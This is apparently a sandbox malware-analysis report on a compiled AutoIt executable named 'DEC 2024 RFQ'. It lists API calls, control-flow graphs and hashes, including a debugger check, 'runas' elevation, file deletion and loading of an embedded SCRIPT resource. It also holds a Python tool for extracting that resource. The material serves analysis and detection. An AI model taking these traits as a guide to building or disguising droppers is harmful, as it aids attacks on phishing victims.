103515->103512 103517 27de1 59 API calls 103516->103517 103519 8d147 103517->103519 103607 83a2a 63 API calls Mailbox 103519->103607 103521->103480 103521->103511 103522 8d150 Mailbox 103522->103504 103524 27667 59 API calls 103523->103524 103525 9c2f4 103524->103525 103526 27667 59 API calls 103525->103526 103527 9c2fc 103526->103527 103528 27667 59 API calls 103527->103528 103529 9c304 103528->103529 103530 29837 84 API calls 103529->103530 103554 9c312 103530->103554 103531 27bcc 59 API calls 103531->103554 103532 27924 59 API calls 103532->103554 103533 9c4fb 103536 9c528 Mailbox 103533->103536 103613 29a3c 59 API calls Mailbox 103533->103613 103534 9c4e2 103539 27cab 59 API calls 103534->103539 103536->103372 103537 9c4fd 103541 27cab 59 API calls 103537->103541 103538 28047 59 API calls 103538->103554 103540 9c4ef 103539->103540 103542 27b2e 59 API calls 103540->103542 103543 9c50c 103541->103543 103542->103533 103545 27b2e 59 API calls 103543->103545 103544 27e4f 59 API calls 103547 9c3a9 CharUpperBuffW 103544->103547 103545->103533 103546 27e4f 59 API calls 103548 9c469 CharUpperBuffW 103546->103548 103611 2843a 68 API calls 103547->103611 103612 2c5a7 69 API calls 2 library calls 103548->103612 103551 29837 84 API calls 103551->103554 103552 27cab 59 API calls 103552->103554 103553 27b2e 59 API calls 103553->103554 103554->103531 103554->103532 103554->103533 103554->103534 103554->103536 103554->103537 103554->103538 103554->103544 103554->103546 103554->103551 103554->103552 103554->103553 103556 87962 103555->103556 103557 40db6 Mailbox 59 API calls 103556->103557 103558 87970 103557->103558 103559 8797e 103558->103559 103560 27667 59 API calls 103558->103560 103559->103372 103560->103559 103614 760c0 103561->103614 103563 7618c 103563->103372 103564->103362 103565->103362 103566->103372 103567->103378 103568->103366 103569->103380 103570->103372 103571->103348 103572->103374 103573->103374 103574->103374 103575->103360 103576->103361 103577->103360 
103578->103432 103579->103394 103580->103429 103581->103429 103583 255a2 103582->103583 103584 2557d 103582->103584 103585 27d8c 59 API calls 103583->103585 103584->103583 103588 2558c 103584->103588 103589 8325e 103585->103589 103586 8328d 103586->103464 103590 25ab8 59 API calls 103588->103590 103589->103586 103604 831fa ReadFile SetFilePointerEx 103589->103604 103605 27924 59 API calls 2 library calls 103589->103605 103592 8337e 103590->103592 103593 254d2 61 API calls 103592->103593 103594 8338c 103593->103594 103596 8339c Mailbox 103594->103596 103606 277da 61 API calls Mailbox 103594->103606 103596->103464 103597->103439 103598->103468 103599->103469 103600->103440 103601->103440 103602->103462 103603->103467 103604->103589 103605->103589 103606->103596 103607->103522 103608->103484 103609->103511 103610->103511 103611->103554 103612->103554 103613->103536 103615 760cb 103614->103615 103616 760e8 103614->103616 103615->103616 103618 760ab 59 API calls Mailbox 103615->103618 103616->103563 103618->103615 103619 2107d 103624 2708b 103619->103624 103621 2108c 103622 42d40 __cinit 67 API calls 103621->103622 103623 21096 103622->103623 103625 2709b __ftell_nolock 103624->103625 103626 27667 59 API calls 103625->103626 103627 27151 103626->103627 103628 24706 61 API calls 103627->103628 103629 2715a 103628->103629 103655 4050b 103629->103655 103632 27cab 59 API calls 103633 27173 103632->103633 103634 23f74 59 API calls 103633->103634 103635 27182 103634->103635 103636 27667 59 API calls 103635->103636 103637 2718b 103636->103637 103638 27d8c 59 API calls 103637->103638 103639 27194 RegOpenKeyExW 103638->103639 103640 5e8b1 RegQueryValueExW 103639->103640 103645 271b6 Mailbox 103639->103645 103641 5e943 RegCloseKey 103640->103641 103642 5e8ce 103640->103642 103641->103645 103654 5e955 _wcscat Mailbox __NMSG_WRITE 103641->103654 103643 40db6 Mailbox 59 API calls 103642->103643 103644 5e8e7 103643->103644 103646 2522e 59 API calls 103644->103646 103645->103621 
103647 5e8f2 RegQueryValueExW 103646->103647 103649 5e90f 103647->103649 103651 5e929 103647->103651 103648 279f2 59 API calls 103648->103654 103650 27bcc 59 API calls 103649->103650 103650->103651 103651->103641 103652 27de1 59 API calls 103652->103654 103653 23f74 59 API calls 103653->103654 103654->103645 103654->103648 103654->103652 103654->103653 103656 51940 __ftell_nolock 103655->103656 103657 40518 GetFullPathNameW 103656->103657 103658 4053a 103657->103658 103659 27bcc 59 API calls 103658->103659 103660 27165 103659->103660 103660->103632

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00023B68
• IsDebuggerPresent.KERNEL32 ref: 00023B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,000E52F8,000E52E0,?,?), ref: 00023BEB
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
  • Part of subcall function 0003092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00023C14,000E52F8,?,?,?), ref: 0003096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00023C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,000D7770,00000010), ref: 0005D281
• SetCurrentDirectoryW.KERNEL32(?,000E52F8,?,?,?), ref: 0005D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,000D4260,000E52F8,?,?,?), ref: 0005D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0005D346
  • Part of subcall function 00023A46: GetSysColorBrush.USER32(0000000F), ref: 00023A50
  • Part of subcall function 00023A46: LoadCursorW.USER32(00000000,00007F00), ref: 00023A5F
  • Part of subcall function 00023A46: LoadIconW.USER32(00000063), ref: 00023A76
  • Part of subcall function 00023A46: LoadIconW.USER32(000000A4), ref: 00023A88
  • Part of subcall function 00023A46: LoadIconW.USER32(000000A2), ref: 00023A9A
  • Part of subcall function 00023A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00023AC0
  • Part of subcall function 00023A46: RegisterClassExW.USER32(?), ref: 00023B16
  • Part of subcall function 000239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00023A03
  • Part of subcall function 000239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00023A24
  • Part of subcall function 000239D5: ShowWindow.USER32(00000000,?,?), ref: 00023A38
  • Part of subcall function 000239D5: ShowWindow.USER32(00000000,?,?), ref: 00023A41
  • Part of subcall function 0002434A: _memset.LIBCMT ref: 00024370
  • Part of subcall function 0002434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00024415
Strings
• runas, xrefs: 0005D33A
• This is a third-party compiled AutoIt script., xrefs: 0005D279
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 529118366-3287110873
• Opcode ID: 0fac0c13985ebc45d0e732466a61753f595478cc8c78868106c0ad09c9fa2181
• Instruction ID: 8af1114b915be1d92a949ee641ec16704efaf558545b207ffe1a9f6ae5e8b13d
• Opcode Fuzzy Hash: 0fac0c13985ebc45d0e732466a61753f595478cc8c78868106c0ad09c9fa2181
• Instruction Fuzzy Hash: 7A513730D08698AEDF11EBB4FC46AFD7B78AF46705F10446AF615BA162CA784605CB20

Control-flow Graph

• Executed
• Not Executed
[control_flow_graph for function 249a0: entry block 249a0-24a00 calls 27667, GetVersionExW and 27bcc; later blocks call 27d2c, 27726, GetCurrentProcess, IsWow64Process, 24b37, GetNativeSystemInfo, FreeLibrary and GetSystemInfo. Basic-block edge list not rendered.]
APIs
• GetVersionExW.KERNEL32(?), ref: 000249CD
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
• GetCurrentProcess.KERNEL32(?,000AFAEC,00000000,00000000,?), ref: 00024A9A
• IsWow64Process.KERNEL32(00000000), ref: 00024AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00024AE7
• FreeLibrary.KERNEL32(00000000), ref: 00024AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00024B23
• GetSystemInfo.KERNEL32(00000000), ref: 00024B2F
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: ba0900a2a91685a0985d810cec029b6800a699ed39e270f8f612d505cbe72637
• Instruction ID: 129d157a9812fc5fb8e6f784b65412f466d2c85dd253e043c41743569776b28d
• Opcode Fuzzy Hash: ba0900a2a91685a0985d810cec029b6800a699ed39e270f8f612d505cbe72637
• Instruction Fuzzy Hash: 9591E33198DBD1DEC771CB7894501ABBFF5AF2A301B4449AED0CB93A02D660E50CC75A

                                                                                                                       Control-flow Graph (basic blocks with their API calls and successor blocks)
                                                                                                                       • 1063 24e89-24ea1 CreateStreamOnHGlobal -> 1064, 1065
                                                                                                                       • 1064 24ea3-24eba FindResourceExW -> 1066, 1067
                                                                                                                       • 1065 24ec1-24ec6 (no successors)
                                                                                                                       • 1066 24ec0 -> 1065
                                                                                                                       • 1067 5d933-5d942 LoadResource -> 1066, 1068
                                                                                                                       • 1068 5d948-5d956 SizeofResource -> 1066, 1069
                                                                                                                       • 1069 5d95c-5d967 LockResource -> 1066, 1070
                                                                                                                       • 1070 5d96d-5d975 -> 1071
                                                                                                                       • 1071 5d979-5d98b -> 1066
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00024D8E,?,?,00000000,00000000), ref: 00024E99
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00024D8E,?,?,00000000,00000000), ref: 00024EB0
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F), ref: 0005D937
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F), ref: 0005D94C
                                                                                                                      • LockResource.KERNEL32(00024D8E,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F,00000000), ref: 0005D95F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      • Opcode ID: c5eff8b189c4924cecc8d42d2f3ac3aa16a3c8163c1f3cc506a889d156750c2e
                                                                                                                      • Instruction ID: 42cc5ecced8320659d555dc72fdad6922e8fd60ff8ff45e63e343d9f6fdc6c7a
                                                                                                                      • Opcode Fuzzy Hash: c5eff8b189c4924cecc8d42d2f3ac3aa16a3c8163c1f3cc506a889d156750c2e
                                                                                                                      • Instruction Fuzzy Hash: D3115E75240701BFEB218BA5EC88F677BBAFBC6B51F104269F4058A250DB65EC008A60
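The API sequence above (CreateStreamOnHGlobal, then FindResourceExW with type 0000000A, i.e. RT_RCDATA, and the name SCRIPT, followed by LoadResource, SizeofResource and LockResource) is the AutoIt3 runtime loading its compiled script out of the executable's own resource section; it is the behaviour behind the "Binary is likely a compiled AutoIt script file" signature. The Python below is an added example, not code from the Joe Sandbox report or from AutoIt: it walks the PE resource directory with the standard library only and returns the raw RT_RCDATA/SCRIPT blob (the input that decoders such as Exe2Aut consume), or None when no such resource exists, which is the first check to run on a suspicious "RFQ" executable. Because the sample itself is not on the page, build_test_pe constructs a minimal PE32 with a placeholder resource so the parser can be exercised offline; that layout, and the file name in the usage comment, are assumptions.

```python
import hashlib
import struct
import sys

# What the AutoIt3 runtime asks FindResourceExW for above: type 0xA (RT_RCDATA), name "SCRIPT".
RT_RCDATA, SCRIPT_NAME = 10, "SCRIPT"


def _parse_headers(pe):
    """Return (resource directory RVA, [(va, size, raw_ptr), ...]) for a PE32/PE32+ image."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections, opt_size = struct.unpack_from("<H12xH", pe, e_lfanew + 6)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", pe, opt)
    dd = {0x10B: opt + 96, 0x20B: opt + 112}.get(magic)       # start of the data directories
    if dd is None:
        raise ValueError("unknown optional header magic")
    (rsrc_rva,) = struct.unpack_from("<I", pe, dd + 2 * 8)     # IMAGE_DIRECTORY_ENTRY_RESOURCE
    sections = []
    for i in range(n_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))
    return rsrc_rva, sections


def _rva_to_offset(sections, rva):
    for va, size, raw_ptr in sections:
        if va <= rva < va + size:
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is outside every section")


def _entries(pe, base, dir_off):
    """Yield (key, is_subdir, target_offset) for each entry of one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", pe, dir_off + 12)
    for i in range(n_named + n_id):
        name_or_id, target = struct.unpack_from("<II", pe, dir_off + 16 + 8 * i)
        if name_or_id & 0x80000000:                             # named entry: u16 length + UTF-16LE
            s = base + (name_or_id & 0x7FFFFFFF)
            (n,) = struct.unpack_from("<H", pe, s)
            key = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le")
        else:
            key = name_or_id
        yield key, bool(target & 0x80000000), base + (target & 0x7FFFFFFF)


def find_autoit_script(pe):
    """Return the raw RT_RCDATA/"SCRIPT" resource bytes, or None if the image has none."""
    rsrc_rva, sections = _parse_headers(pe)
    if rsrc_rva == 0:
        return None
    base = _rva_to_offset(sections, rsrc_rva)
    for type_key, is_dir, type_dir in _entries(pe, base, base):            # level 1: type
        if type_key != RT_RCDATA or not is_dir:
            continue
        for name_key, is_dir2, name_dir in _entries(pe, base, type_dir):   # level 2: name
            if name_key != SCRIPT_NAME or not is_dir2:
                continue
            for _lang, is_dir3, entry in _entries(pe, base, name_dir):     # level 3: language
                if not is_dir3:                                            # IMAGE_RESOURCE_DATA_ENTRY
                    data_rva, size = struct.unpack_from("<II", pe, entry)
                    off = _rva_to_offset(sections, data_rva)
                    return bytes(pe[off:off + size])
    return None


def is_compiled_autoit(pe):
    try:                                   # malformed or truncated input counts as "no"
        return find_autoit_script(pe) is not None
    except (ValueError, struct.error):
        return False


def build_test_pe(script, name="SCRIPT"):
    """Constructed minimal PE32 with one .rsrc section (test input only, not a real sample)."""
    rsrc_rva, rsrc_raw = 0x1000, 0x200
    wname = name.encode("utf-16-le")
    data_off = (90 + len(wname) + 3) & ~3                        # name string at 88, data 4-aligned after it
    r = bytearray()
    r += struct.pack("<IIHHHHII", 0, 0, 0, 0, 0, 1, RT_RCDATA, 0x80000000 | 24)         # root: type 10 -> dir @24
    r += struct.pack("<IIHHHHII", 0, 0, 0, 0, 1, 0, 0x80000000 | 88, 0x80000000 | 48)   # type dir: name@88 -> dir @48
    r += struct.pack("<IIHHHHII", 0, 0, 0, 0, 0, 1, 0x409, 72)                          # name dir: lang -> data entry @72
    r += struct.pack("<IIII", rsrc_rva + data_off, len(script), 0, 0)                   # data entry: RVA, size
    r += struct.pack("<H", len(name)) + wname + b"\0" * (data_off - 90 - len(wname)) + script
    hdr = bytearray(rsrc_raw)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                              # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x0102)              # COFF: i386, 1 section, 224-byte opt hdr
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                                              # PE32 magic
    struct.pack_into("<I", hdr, opt + 92, 16)                                            # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 2 * 8, rsrc_rva, len(r))                     # resource data directory
    sh = opt + 224
    hdr[sh:sh + 8] = b".rsrc\0\0\0"
    struct.pack_into("<IIII", hdr, sh + 8, len(r), rsrc_rva, len(r), rsrc_raw)            # VirtualSize, VA, SizeOfRawData, PointerToRawData
    struct.pack_into("<I", hdr, sh + 36, 0x40000040)                                     # IMAGE_SCN_CNT_INITIALIZED_DATA | MEM_READ
    return bytes(hdr) + bytes(r)


if __name__ == "__main__":   # usage: python autoit_rsrc.py "DEC 2024 RFQ.exe" (file name assumed; no argument -> constructed PE)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(b"constructed placeholder")
    blob = find_autoit_script(data)
    print("no RT_RCDATA/SCRIPT resource" if blob is None
          else f"SCRIPT resource: {len(blob)} bytes, sha256 {hashlib.sha256(blob).hexdigest()}")
```

On a real compiled AutoIt binary the returned bytes are AutoIt's own script container rather than plaintext, so decoding is a separate step; the presence check alone already confirms what the runtime's resource lookup above implies, and the hash of the blob is a useful pivot for matching other samples that carry the same script behind a different stub.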
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0005E398), ref: 0008446A
                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0008447B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008448B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: 8d455b3c7ab02936f2144ba0d8a6b5884688bb0f266583a6441bcd006af5db49
                                                                                                                      • Instruction ID: 4e3dfb740bbd15c23b9aed6bdcfd18a6bc6d202a5e68516c432bb2369ae201b0
                                                                                                                      • Opcode Fuzzy Hash: 8d455b3c7ab02936f2144ba0d8a6b5884688bb0f266583a6441bcd006af5db49
                                                                                                                      • Instruction Fuzzy Hash: 1AE0D8334109026752107B78EC0D5FA7B9CAF06335F100725F875C10E0EBB85D009795
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00030A5B
                                                                                                                      • timeGetTime.WINMM ref: 00030D16
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00030E53
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00030E61
                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00030EFA
                                                                                                                      • DestroyWindow.USER32 ref: 00030F06
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00030F20
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00064E83
                                                                                                                      • TranslateMessage.USER32(?), ref: 00065C60
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00065C6E
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00065C82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                      • API String ID: 4212290369-3242690629
                                                                                                                      • Opcode ID: fe01a9f204fdda6871f7d475b0daf9fab2eb4af975dcaa20d5cebe34cb84702b
                                                                                                                      • Instruction ID: d35c440980fd2eefb775f3dc18366f744b6674c02ce58a94173025191475c7d0
                                                                                                                      • Opcode Fuzzy Hash: fe01a9f204fdda6871f7d475b0daf9fab2eb4af975dcaa20d5cebe34cb84702b
                                                                                                                      • Instruction Fuzzy Hash: F4B2F270608B41DFD729DF24C894BAEB7E5BF85304F14491DF58A9B2A2CB75E884CB42

                                                                                                                       Control-flow Graph (basic blocks with their calls and successor blocks)
                                                                                                                       • 524 89155-89205 (calls 51940, 40db6, 2522e, 88f5f, 24ee5, 4354c) -> 537, 538
                                                                                                                       • 537 892b8-892bf (call 89734) -> 543, 544
                                                                                                                       • 538 8920b-89212 (call 89734) -> 544, 545
                                                                                                                       • 543 892c8 -> 548
                                                                                                                       • 544 892c1-892c3 -> 546
                                                                                                                       • 545 89218-892b6 (calls 440fb, 42dbc, 42d8d, 440fb, 42d8d x2) -> 548
                                                                                                                       • 546 8952a-8952b -> 549
                                                                                                                       • 548 892cb-89387 (calls 24f0b x8, 898e3, 4525b) -> 583, 584
                                                                                                                       • 549 89548-89558 (call 25211) (no successors)
                                                                                                                       • 583 89389-8938b -> 546
                                                                                                                       • 584 89390-893ab (call 88fa5) -> 587, 588
                                                                                                                       • 587 8943d-89449 (call 453a6) -> 595, 596
                                                                                                                       • 588 893b1-893b9 -> 589, 590
                                                                                                                       • 589 893bb-893bf -> 592
                                                                                                                       • 590 893c1 -> 592
                                                                                                                       • 592 893c6-893e4 (call 24f0b) -> 602, 603
                                                                                                                       • 595 8944b-8945a DeleteFileW -> 546
                                                                                                                       • 596 8945f-89463 -> 598, 599
                                                                                                                       • 598 89469-894f2 (calls 440bb, 899ea, 88b06) -> 601, 620
                                                                                                                       • 599 89505-89519 CopyFileW -> 600, 601
                                                                                                                       • 600 8951b-89528 DeleteFileW -> 546
                                                                                                                       • 601 8952d-89543 DeleteFileW (call 898a2) -> 549
                                                                                                                       • 602 8940e-89424 (calls 88953, 44863) -> 616
                                                                                                                       • 603 893e6-893eb -> 607
                                                                                                                       • 607 893ee-89401 (call 890dd) -> 617
                                                                                                                       • 616 89429-89434 -> 588, 619
                                                                                                                       • 617 89403-8940c -> 602
                                                                                                                       • 619 8943a -> 587
                                                                                                                       • 620 894f4-89503 DeleteFileW -> 546
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00088F5F: __time64.LIBCMT ref: 00088F69
                                                                                                                        • Part of subcall function 00024EE5: _fseek.LIBCMT ref: 00024EFD
                                                                                                                      • __wsplitpath.LIBCMT ref: 00089234
                                                                                                                        • Part of subcall function 000440FB: __wsplitpath_helper.LIBCMT ref: 0004413B
                                                                                                                      • _wcscpy.LIBCMT ref: 00089247
                                                                                                                      • _wcscat.LIBCMT ref: 0008925A
                                                                                                                      • __wsplitpath.LIBCMT ref: 0008927F
                                                                                                                      • _wcscat.LIBCMT ref: 00089295
                                                                                                                      • _wcscat.LIBCMT ref: 000892A8
                                                                                                                        • Part of subcall function 00088FA5: _memmove.LIBCMT ref: 00088FDE
                                                                                                                        • Part of subcall function 00088FA5: _memmove.LIBCMT ref: 00088FED
                                                                                                                      • _wcscmp.LIBCMT ref: 000891EF
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089824
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089837
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00089452
                                                                                                                      • _wcsncpy.LIBCMT ref: 000894C5
                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 000894FB
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00089511
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00089522
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00089534
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1500180987-0
                                                                                                                      • Opcode ID: c9cafc94ccd2a8b2fd95009ef802fd7699fb697c8c407c6ed47da4941ee0ee45
                                                                                                                      • Instruction ID: af96d938139933fc7fc355a33f9622a0df142a22da71a03dba5cec4dae729fa8
                                                                                                                      • Opcode Fuzzy Hash: c9cafc94ccd2a8b2fd95009ef802fd7699fb697c8c407c6ed47da4941ee0ee45
                                                                                                                      • Instruction Fuzzy Hash: 5CC12EB1D00229AADF21EF95CC85EEEB7BDEF45310F0440A6F609E6152EB709A448F65

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
